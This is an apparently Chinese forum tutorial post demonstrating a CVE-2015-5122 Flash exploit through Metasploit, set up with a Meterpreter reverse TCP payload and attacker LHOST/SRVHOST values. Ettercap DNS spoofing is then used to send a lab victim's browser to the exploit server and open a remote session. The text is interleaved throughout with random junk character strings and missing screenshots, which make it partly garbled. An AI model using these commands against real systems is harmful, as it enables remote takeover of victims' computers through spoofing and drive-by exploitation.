cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

1 [. Z; I, N) Q# { 二、cve2015-5122漏洞实例演示虚拟机 3 U9 o: Q7 w9 U$ k# d9 F }

/ Z# u+ Q& K$ h, u* J$ X8 p5 g 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 3 N8 m# w0 U: ~

' n5 O% e4 y9 S1 G. K' r% Y5 N search cve-2015-5122如图： % ~. i& g: T! f

( b: x5 e6 ^) c# C/ | + o- g7 z2 Q+ l. U

. F# m) k/ \8 `9 e6 o: i 下面我们敲如下命令： ; q: A1 i( y: f' G* X' i; x5 B

3 D: {5 P; C5 ]! k use exploit/multi/browser/adobe_flash_opaque_background_uaf * _) J) p, d8 e+ G- l' j$ H

2 |- B$ @0 p$ T5 {& D4 }- t% b set PAYLOAD windows/meterpreter/reverse_tcp 0 }/ p4 v6 Z# w; Y5 b! R

) j4 Y# k, ]$ K" E set LHOST 192.168.0.109 + u6 U$ w9 [3 H; L

r# l6 I* p. _8 N$ t, g set URIPATH / /*根目录*/ ( M2 Y- l: ]' {7 }

* b6 U; B: l2 }/ H set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 9 [$ r5 i: } H% x- i) t

& t. ~8 ^2 ]$ ^: n# A$ V set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 2 o$ O9 X/ K# `0 u# p

1 x7 j! y! f) I8 E/ p 然后show options如图： 4 I8 E: d6 N# ]& k/ q3 J

6 E! z) v0 X' ^% f # z/ q0 O1 ~! n. ?5 J. p: z' K

( u6 m. S! A6 [2 Z- k7 x$ {5 N 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
- i$ R l8 o. D- e " s+ h) Y5 J1 f

: [2 y- \& ?( K, p8 a6 A 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 9 s8 {4 d# {) w+ D

" S( p& K0 m: C" p Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 6 l/ B, v4 T8 g0 M7 Z6 R

, E4 }# S) Q* a r% N; k$ A 3 R5 E8 I) G8 q- T

3 |. t$ b2 ?+ ?: O 成功了，这时候我们断开ettercap，如图： 9 |" H5 h; `% L& ~) @7 ?7 d

7 { V {) \8 @" W, s1 X1 q8 G, M ; E0 _: A7 F6 e$ b" u/ {1 y

% o* s( e) k$ a3 G Screenshot如图： % a2 z) P! [% n0 g) V0 v

( F3 j( W1 h0 r0 H" @ W) K2 A8 j* Q! M

E! j1 J" ?. v1 }4 Q1 _$ Q . |" e9 s3 ^' J% w

		自动登录	找回密码
密码			立即注册